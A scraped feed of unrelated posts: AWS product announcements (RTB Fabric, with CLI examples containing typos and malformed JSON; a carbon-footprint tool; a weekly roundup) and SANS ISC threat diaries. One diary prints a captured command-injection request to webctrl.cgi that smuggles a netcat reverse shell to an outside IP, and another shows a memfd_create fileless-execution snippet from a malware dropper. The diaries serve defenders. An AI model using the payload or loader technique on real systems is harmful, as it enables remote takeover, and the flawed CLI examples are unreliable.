Introducing AWS RTB Fabric for real-time advertising technology workloads

This post was originally published on this site

Today, we’re announcing AWS RTB Fabric, a fully managed service purpose built for real-time bidding (RTB) advertising workloads. The service helps advertising technology (AdTech) companies seamlessly connect with their supply and demand partners, such as Amazon Ads, GumGum, Kargo, MobileFuse, Sovrn, TripleLift, Viant, Yieldmo and more, to run high-volume, latency-sensitive RTB workloads on Amazon Web Services (AWS) with consistent single-digit millisecond performance and up to 80% lower networking costs compared to standard networking costs.

AWS RTB Fabric provides a dedicated, high-performance network environment for RTB workloads and partner integrations without requiring colocated, on-premises infrastructure or upfront commitments. The following diagram shows the high-level architecture of RTB Fabric.

AWS RTB Fabric also includes modules, a capability that helps customers bring their own and partner applications securely into the compute environment used for real-time bidding. Modules support containerized applications and foundation models (FMs) that can enhance transaction efficiency and bidding effectiveness. At launch, AWS RTB Fabric includes modules for optimizing traffic management, improving bid efficiency, and increasing bid response rates, all running inline within the service for consistent low-latency execution.

The growth of programmatic advertising has created a need for low-latency, cost-efficient infrastructure to support RTB workloads. AdTech companies process millions of bid requests per second across publishers, supply-side platforms (SSPs), and demand-side platforms (DSPs). These workloads are highly sensitive to latency because most RTB auctions must complete within 200–300 milliseconds and require reliable, high-speed exchange of OpenRTB requests and responses among multiple partners. Many companies have addressed this by deploying infrastructure in colocation data centers near key partners, which reduces latency but adds operational complexity, long provisioning cycles, and high costs. Others have turned to cloud infrastructure to gain elasticity and scale, but they often face complex provisioning, partner-specific connectivity, and long-term commitments to achieve cost efficiency. These gaps add operational overhead and limit agility. AWS RTB Fabric solves these challenges by providing a managed private network built for RTB workloads that delivers consistent performance, simplifies partner onboarding, and achieves predictable cost efficiency without the burden of maintaining colocation or custom networking setups.

Key capabilities
AWS RTB Fabric introduces a managed foundation for running RTB workloads at scale. The service provides the following key capabilities:

  • Simplified connectivity to AdTech partners – When you register an RTB Fabric gateway, the service automatically generates secure endpoints that can be shared with selected partners. Using the AWS RTB Fabric API, you can create optimized, private connections to exchange RTB traffic securely across different environments. External Links are also available to connect with partners who aren’t using RTB Fabric, such as those operating on premises or in third-party cloud environments. This approach shortens integration time and simplifies collaboration among AdTech participants.
  • Dedicated network for low-latency advertising transactions – AWS RTB Fabric provides a managed, high-performance network layer optimized for OpenRTB communication. It connects AdTech participants such as SSPs, DSPs, and publishers through private, high-speed links that deliver consistent single-digit millisecond latency. The service automatically optimizes routing paths to maintain predictable performance and reduce networking costs, without requiring manual peering or configuration.
  • Pricing model aligned with RTB economics – AWS RTB Fabric uses a transaction-based pricing model designed to align with programmatic advertising economics. Customers are billed per billion transactions, providing predictable infrastructure costs that align with how advertising exchanges, SSPs, and DSPs operate.
  • Built-in traffic management modules – AWS RTB Fabric includes configurable modules that help AdTech workloads operate efficiently and reliably. Modules such as Rate Limiter, OpenRTB Filter, and Error Masking help you control request volume, validate message formats, and manage response handling directly in the network path. These modules execute inline within the AWS RTB Fabric environment, maintaining network-speed performance without adding application-level latency. All configurations are managed through the AWS RTB Fabric API, so you can define and update rules programmatically as your workloads scale.

Getting started
Today, you can start building with AWS RTB Fabric using the AWS Management Console, AWS Command Line Interface (AWS CLI), or infrastructure-as-code (IaC) tools such as AWS CloudFormation and Terraform.

The console provides a visual entry point to view and manage RTB gateways and links, as shown on the Dashboard of the AWS RTB Fabric console.

You can also use the AWS CLI to configure gateways, create links, and manage traffic programmatically. When I started building with AWS RTB Fabric, I used the AWS CLI to configure everything from gateway creation to link setup and traffic monitoring. The setup ran inside my Amazon Virtual Private Cloud (Amazon VPC) endpoint while AWS managed the low-latency infrastructure that connected workloads.

To begin, I created a requester gateway to send bid requests and a responder gateway to receive and process bid responses. These gateways act as secure communication points within the AWS RTB Fabric.

# Create a requester gateway with required parameters
aws rtbfabric create-requester-gateway 
  --description "My RTB requester gateway" 
  --vpc-id vpc-12345678 
  --subnet-ids subnet-abc12345 subnet-def67890 
  --security-group-ids sg-12345678 
  --client-token "unique-client-token-123"
# Create a responder gateway with required parameters
aws rtbfabric create-responder-gateway 
  --description "My RTB responder gateway" 
  --vpc-id vpc-01f345ad6524a6d7 
  --subnet-ids subnet-abc12345 subnet-def67890 
  --security-group-ids sg-12345678 
  --dns-name responder.example.com 
  --port 443 
  --protocol HTTPS

After both gateways were active, I created a link from the requester to the responder to establish a private, low-latency communication path for OpenRTB traffic. The link handled routing and load balancing automatically.

# Requester account creating a link from requester gateway to a responder gateway
aws rtbfabric create-link 
  --gateway-id rtb-gw-requester123 
  --peer-gateway-id rtb-gw-responder456 
  --log-settings '{"applicationLogs:{"sampling":"errorLog":10.0,"filterLog":10.0}}'
# Responder account accepting a link from requester gateway to responder gateway
aws rtbfabfic accept-link 
  --gateway-id rtb-gw-responder456 
  --link-id link-reqtoresplink789 
  --log-settings '{"applicationLogs:{"sampling":"errorLog":10.0,"filterLog":10.0}}'

I also connected with external partners using External Links, which extended my RTB workloads to on-premises or third-party environments while maintaining the same latency and security characteristics.

# Create an inbound external link endpoint for an external partner to send bid requests to
aws rtbfabric create-inbound-external-link 
  --gateway-id rtb-gw-responder456
# Create an outbound external link for sending bid requests to an external partner
aws rtbfabric create-outbound-external-link 
  --gateway-id rtb-gw-requester123 
  --public-endpoint "https://my-external-partner-responder.com"

To manage traffic efficiently, I added modules directly into the data path. The Rate Limiter module controlled request volume, and the OpenRTB Filter validated message formats inline at network speed.

# Attach a rate limiting module
aws rtbfabric update-link-module-flow 
  --gateway-id rtb-gw-responder456 
  --link-id link-toresponder789 
  --modules '{"name":"RateLimiter":"moduleParameters":{"rateLimiter":{"tps":10000}}}'

Finally, I used Amazon CloudWatch to monitor throughput, latency, and module performance, and I exported logs to Amazon Simple Storage Service (Amazon S3) for auditing and optimization.

All configurations can also be automated with AWS CloudFormation or Terraform, allowing consistent, repeatable deployment across multiple environments. With RTB Fabric, I could focus on optimizing bidding logic while AWS maintained predictable, single-digit millisecond performance across my AdTech partners.

For more details, refer to the AWS RTB Fabric User Guide.

Now available
AWS RTB Fabric is available today in the following AWS Regions: US East (N. Virginia), US West (Oregon), Asia Pacific (Singapore), Asia Pacific (Tokyo), Europe (Frankfurt), and Europe (Ireland).

AWS RTB Fabric is continually evolving to address the changing needs of the AdTech industry. The service expands its capabilities to support secure integration of advanced applications and AI-driven optimizations in real-time bidding workflows that help customers simplify operations and improve performance on AWS. To learn more about AWS RTB Fabric, visit the AWS RTB Fabric page.

Betty

Customer Carbon Footprint Tool Expands: Additional emissions categories including Scope 3 are now available

This post was originally published on this site

Since it launched in 2022, the Customer Carbon Footprint Tool (CCFT) has supported our customers’ sustainability journey to track, measure, and review their carbon emissions by providing the estimated carbon emissions associated with their usage of Amazon Web Services (AWS) services.

In April, we made major updates in the CCFT, including easier access to carbon emissions data, visibility into emissions by AWS Region, inclusion of location-based emissions (LBM), an updated, independently-verified methodology as well as moving to a dedicated page in the AWS Billing console.

The CCFT is informed by the Greenhouse Gas (GHG) Protocol’s classification of emissions, which classifies a company’s emissions. Today, we’re announcing the inclusion of Scope 3 emissions data and an update to Scope 1 emissions in the CCFT. The new emission categories complement the existing Scope 1 and 2 data, and they’ll give our customers a comprehensive look into their carbon emissions data.

In this updated methodology we incorporate new emissions categories. We’ve added Scope 1 refrigerants and natural gas, alongside the existing Scope 1 emissions from fuel combustion in emergency backup generators (diesel). Although Scope 1 emissions represent a small share of overall emissions, we provide our customers with a complete image of their carbon emissions.

To decide which categories of Scope 3 to include in our model we looked at how material each of them were to the overall carbon impact and confirmed the vast majority of emissions were represented. With that in mind, the methodology now includes:

  • Fuel- and energy-related activities (“FERA” under the GHG Protocol) – This includes upstream emissions from purchased fuels, upstream emissions of purchased electricity, and transmission and distribution (T&D) losses. AWS calculates these emissions using both LBM and the market-based method (MBM).

  • IT hardware – AWS uses a comprehensive cradle-to-gate approach that tracks emissions from raw material extraction through manufacturing and transportation to AWS data centers. We use four calculation pathways: process-based life cycle assessment (LCA) with engineering attributes, extrapolation, representative category average LCA, and economic input-output LCA. AWS prioritizes the most detailed and accurate methods for components that contribute significantly to overall emissions.

  • Buildings and equipment – AWS follows established whole building life cycle assessment (wbLCA) standards, considering emissions from construction, use, and end-of-life phases. The analysis covers data center shells, rooms, and long-lead equipment such as air handling units and generators. The methodology uses both process-based life cycle assessment models and economic input-output analysis to provide comprehensive coverage.

The Scope 3 emissions are then amortized over the assets’ service life (6 years for IT hardware, 50 years for buildings) to calculate monthly emissions that can be allocated to customers. This amortization means that we fairly distribute the total embodied carbon of each asset across its operational lifetime, accounting for scenarios such as early retirement or extended use.

All these updates are part of methodology version 3.0.0 and are explained in detail in our methodology document, which has been independently verified by a third party.

How to access the CCFT
To get started, go to the AWS Billing and Cost Management console and choose Customer Carbon Footprint Tool under Cost and Usage Analysis. You can access your carbon emissions data in the dashboard, download a csv file, or export all data using basic SQL and visualize your data by integrating with AWS Data Exports and Amazon Quick Sight.

To ensure you can make meaningful year-over-year comparisons, we’ve recalculated historical data back to January 2022 using version 3 of the methodology. All the data displayed in the CCFT now uses version 3. To see historical data using v3, choose Create custom data export. A new data export now includes new columns breaking down emissions by Scope 1, 2, and 3.

You can see estimated AWS emissions and estimated emissions savings. The tool shows emissions calculated using the MBM for 38 months of data by default. You can find your emissions calculated using the LBM by choosing LBM in the Calculation method filter on the dashboard. The unit of measurement for carbon emissions is metric tons of carbon dioxide equivalent (MTCO2e), an industry-standard measure.

In the Carbon emissions summary, it shows trends of your carbon emissions over time. You can also find emissions resulting from your usage of AWS services and across all AWS Regions. To learn more, visit Viewing your carbon footprint in the AWS documentation.

Voice of the customer
Some of our customers had early access to these updates. This is what they shared with us:

Sunya Norman, senior vice president, Impact at Salesforce shared “Effective decarbonization begins with visibility into our carbon footprint, especially in Scope 3 emissions. Industry averages are only a starting point. The granular carbon data we get from cloud providers like AWS are critical to helping us better understand the actual emissions associated with our cloud infrastructure and focus reductions where they matter most.”

Gerhard Loske, Head of Environmental Management at SAP said “The latest updates to the CCFT are a big step forward in helping us managing SAP’s sustainability goals. With new Region-specific data, we can now see better where emissions are coming from and take targeted action. The upcoming addition of Scope 3 emissions will give us a much fuller picture of our carbon footprint across AWS workloads. These improvements make it easier for us to turn data into meaningful climate action.”

Pinterest’s Global Sustainability Lead, Mia Ketterling highlighted the benefits of the Scope 3 emission data, saying, “By including Scope 3 emissions data in their CCFT, AWS empowers customers like Pinterest to more accurately measure and report the full carbon footprint of our digital operations. Enhanced transparency helps us drive meaningful climate action across our value chain.”

If you’re attending AWS re:Invent in person in December, join technical leaders from AWS, Adobe, and Salesforce as they reveal how the Customer Carbon Footprint Tool supports their environmental initiatives.

Now available
With Scope 1, 2, and 3 coverage in the CCFT, you can track your emissions over time to understand how you’re trending towards your sustainability goals and see the impact of any carbon reduction projects you’ve implemented. To learn more, visit the Customer Carbon Footprint Tool (CCFT) page.

Give these new features a try in the AWS Billing and Cost Management console and send feedback to AWS re:Post for the CCFT or through your usual AWS Support contacts.

Channy

webctrl.cgi/Blue Angel Software Suite Exploit Attempts. Maybe CVE-2025-34033 Variant?, (Wed, Oct 22nd)

This post was originally published on this site

Starting yesterday, some of our honeypots received POST requests to "/cgi-bin/webctrl.cgi", attempting to exploit an OS command injection vulnerability:

POST /cgi-bin/webctrl.cgi
Host: [honeypot ip]:80
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://[honeypot ip]:80
Dnt: 1
Connection: close
Referer: http://[honeypot ip]:80/cgi-bin/webctrl.cgi?action=pingconfig_page
Cookie: userName=admin; state=login; passWord=
Upgrade-Insecure-Requests: 1

action=pingconfig_update&pos_x=0&pos_y=0&login=3&configchanged=0&ip_address=&pingstatereloadflag=1&ipv6=1&ipaddress=;nc%2087.120.191.94%2031331%20-e/bin/sh;&count=3&size=64&start=Start

The vulnerability appears to be a "classic" OS command injection vulnerability. The "ipaddress" parameter is likely passed straight to "ping" in code like 

ping -c {count} -s {size} {ipaddress}

The count and size parameters are easy to validate as they are numbers. The ipaddress parameter is likely supposed to allow for hostnames, making validation a little bit trickier. I talked at length about OS command injection and how to prevent it in a video last year (see https://www.youtube.com/watch?v=7QDO3pZbum8 )

Identifying the exact vulnerability this request attempts to exploit is not so straightforward.

Searching the National Vulnerability Database (https://nvd.nist.gov) leads to two different vulnerabilities for "webctrl.cgi":

CVE-2021-40351: webctrl.cgi.elf on Christie Digital DWU850-GS V06.46 devices allows attackers to perform any desired action via a crafted query containing an unspecified Cookie header. Authentication bypass can be achieved by including an administrative cookie that the device does not validate.

CVE-2025-34033: An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command.

The first one refers to a cookie header. We would have an "interesting" cookie header, but the exploited vulnerability appears to affect the "pingconfig_update" action, pointing to CVE-2025-34033. However, the detailed description states:

An OS command injection vulnerability exists in the Blue Angel Software Suite running on embedded Linux devices via the ping_addr parameter in the webctrl.cgi script. The application fails to properly sanitize input before passing it to the system-level ping command. An authenticated attacker can inject arbitrary commands by appending shell metacharacters to the ping_addr parameter in a crafted GET request to /cgi-bin/webctrl.cgi?action=pingtest_update. The command's output is reflected in the application's web interface, enabling attackers to view results directly. Default and backdoor credentials can be used to access the interface and exploit the issue. Successful exploitation results in arbitrary command execution as the root user.

Our attack uses the 'ipaddress' parameter, not the 'ping_addr' parameter. The NVD entry also suggests this requires a GET entry and an action set to 'pingtest_update', not a POST entry with an action of 'pingconfig_update'.

There are sadly many similar vulnerabilities. Many IoT/Router appliances have had vulnerabilities in their "ping" implementation in the past that looked exactly like what we have here. In 2019, an exploit was published for CVE-2025-34033 [1]. The vendor behind the software, 5VTech, appears to specialize in VoIP and similar equipment for Broadband networks [2].

There are two options at this point: (a) this is a new version of the CVE-2025-34033 vulnerability, or (b) the attacker messed up. Without a test device, this isn't easy to verify.

[1]https://www.exploit-db.com/exploits/46792
[2] http://www.5vtechnologies.com/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

What time is it? Accuracy of pool.ntp.org., (Tue, Oct 21st)

This post was originally published on this site

Yesterday, Chinese security services published a story alleging a multi-year attack against the systems operating the Chinese standard time (CST), sometimes called Beijing Standard Time. China uses only one time zone across the country, and has not used daylight saving time since 1991. Most operating systems use UTC internally and display local time zones for user convenience. Modern operating systems use NTP to synchronize time. Popular implementations are ntpd and chrony. The client will poll several servers, disregard outliers, and usually sync with the "best" time server based on latency and jitter detected.

AWS Weekly Roundup: Kiro waitlist, EBS Volume Clones, EC2 Capacity Manager, and more (October 20, 2025)

This post was originally published on this site

I’ve been inspired by all the activities that tech communities around the world have been hosting and participating in throughout the year. Here in the southern hemisphere we’re starting to dream about our upcoming summer breaks and closing out on some of the activities we’ve initiated this year. The tech community in South Africa is participating in Amazon Q Developer coding challenges that my colleagues and I are hosting throughout this month as a fun way to wind down activities for the year. The first one was hosted in Johannesburg last Friday with Durban and Cape Town coming up next.

Last week’s launches
These are the launches from last week that caught my attention:

Additional updates
I thought these projects, blog posts, and news items were also interesting:

Upcoming AWS events
Keep a look out and be sure to sign up for these upcoming events:

AWS re:Invent 2025 (December 1-5, 2025, Las Vegas) — AWS flagship annual conference offering collaborative innovation through peer-to-peer learning, expert-led discussions, and invaluable networking opportunities.

Join the AWS Builder Center to learn, build, and connect with builders in the AWS community. Browse here for upcoming in-person and virtual developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Veliswa.

Using Syscall() for Obfuscation/Fileless Activity, (Mon, Oct 20th)

This post was originally published on this site

I found another piece of malware this weekend. This one looks more like a proof-of-concept because the second-stage payload is really "simple", but it attracted my attention because it uses a nice technique to obfuscate the code.

The dropper is a simple Python script (SHA256:e6f7afb92153561ff6c584fee1b04fb132ba984e8a28ca63708a88ebad15b939) with a low VT score of 4/62[1]. The script contains an embedded Base64 payload that, once decoded, will be executed. This second stage is an ELF file, indicating the script targets a Linux system.

What attracted my attention is the direct use of syscall()[2] instead of classic functions:

import ctypes
libc = ctypes.CDLL(None)
syscall = libc.syscall
[...]
fd = syscall(319, "", 1)
os.write(fd, content)

A full list of available syscalls is documented by many websites[3]. The syscall 319 is "memfd_create" and, as the name suggests, it allows creating a file descriptor in memory (read: without touching the filesystem). 

The Base64 payload is not very interesting, it's an ELF file (SHA256:52fc723f7e0c4202c97ac5bc2add2d1d3daa5c3f84f3d459a6a005a3ae380119) that will just encrypt files using a 1-byte XOR key:

[1] https://www.virustotal.com/gui/file/e6f7afb92153561ff6c584fee1b04fb132ba984e8a28ca63708a88ebad15b939/detection
[2] https://man7.org/linux/man-pages/man2/syscalls.2.html
[3] https://www.chromium.org/chromium-os/developer-library/reference/linux-constants/syscalls/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.